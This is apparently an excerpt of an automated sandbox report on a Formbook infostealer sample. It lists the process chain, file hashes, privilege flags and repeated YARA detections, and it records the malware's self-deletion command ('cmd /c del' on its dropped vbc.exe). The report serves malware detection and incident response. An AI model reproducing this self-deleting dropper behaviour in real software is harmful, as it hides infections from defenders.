                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2167067209.0000000002900000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                        • Detection: 36%, ReversingLabs
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:15
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                        File size:217624 bytes
                                                                                                                                                                                                        MD5 hash:2915C0AFB0B6B26A5A699965D2119F7A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2205774849.00000000003A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2205709374.0000000000230000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:18
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                        Imagebase:0xffca0000
                                                                                                                                                                                                        File size:3229696 bytes
                                                                                                                                                                                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:33
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                                                        Imagebase:0x1a0000
                                                                                                                                                                                                        File size:27136 bytes
                                                                                                                                                                                                        MD5 hash:CABB20E171770FF64614A54C1F31C033
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2375588178.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2375705185.00000000001F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2375743991.00000000002B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                                        General

                                                                                                                                                                                                        Start time:10:26:37
                                                                                                                                                                                                        Start date:23/02/2021
                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                        Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                        Imagebase:0x49d30000
                                                                                                                                                                                                        File size:302592 bytes
                                                                                                                                                                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                        Code Analysis

                                                                                                                                                                                                        Reset < >